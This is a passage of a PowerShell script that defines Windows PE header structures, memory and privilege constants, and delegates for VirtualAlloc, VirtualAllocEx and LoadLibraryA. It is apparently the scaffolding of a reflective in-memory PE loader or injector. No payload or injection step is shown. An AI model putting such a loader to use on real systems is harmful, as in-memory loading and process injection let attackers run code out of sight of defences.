$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
$SubSystemType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType
#Enum DllCharacteristicsType
$TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
$TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
$TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
$TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
$TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
$DllCharacteristicsType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType
########### STRUCT ###########
#Struct IMAGE_DATA_DIRECTORY
$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
$IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY
#Struct IMAGE_FILE_HEADER
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
$TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
$IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
#Struct IMAGE_OPTIONAL_HEADER64
$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
$IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64
#Struct IMAGE_OPTIONAL_HEADER32
$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)
($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null
($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null
($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null
($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null
($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null
($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null
($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null
($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null
($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
$IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32
#Struct IMAGE_NT_HEADERS64
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)
$TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
$TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null
$IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64
#Struct IMAGE_NT_HEADERS32
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)
$TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
$TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null
$IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32
#Struct IMAGE_DOS_HEADER
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)
$TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null
$e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')
$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
$FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))
$e_resField.SetCustomAttribute($AttribBuilder)
$TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null
$e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')
$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))
$e_res2Field.SetCustomAttribute($AttribBuilder)
$TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null
$IMAGE_DOS_HEADER = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER
#Struct IMAGE_SECTION_HEADER
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)
$nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')
$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))
$nameField.SetCustomAttribute($AttribBuilder)
$TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
$IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER
#Struct IMAGE_BASE_RELOCATION
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)
$TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null
$IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION
#Struct IMAGE_IMPORT_DESCRIPTOR
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)
$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null
$IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR
#Struct IMAGE_EXPORT_DIRECTORY
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)
$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null
$IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY
#Struct LUID
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)
$TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null
$LUID = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID
#Struct LUID_AND_ATTRIBUTES
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)
$TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null
$TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null
$LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES
#Struct TOKEN_PRIVILEGES
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)
$TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null
$TOKEN_PRIVILEGES = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES
return $Win32Types
}
Function Get-Win32Constants
{
$Win32Constants = New-Object System.Object
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000
$Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008
$Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020
$Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2
$Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0
return $Win32Constants
}
Function Get-Win32Functions
{
$Win32Functions = New-Object System.Object
$VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
$VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
$VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)
$Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc
$VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx
$VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
$VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)
$Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx
$memcpyAddr = Get-ProcAddress msvcrt.dll memcpy
$memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])
$memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy
$memsetAddr = Get-ProcAddress msvcrt.dll memset
$memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])
$memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset
$LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA
$LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])
$LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)
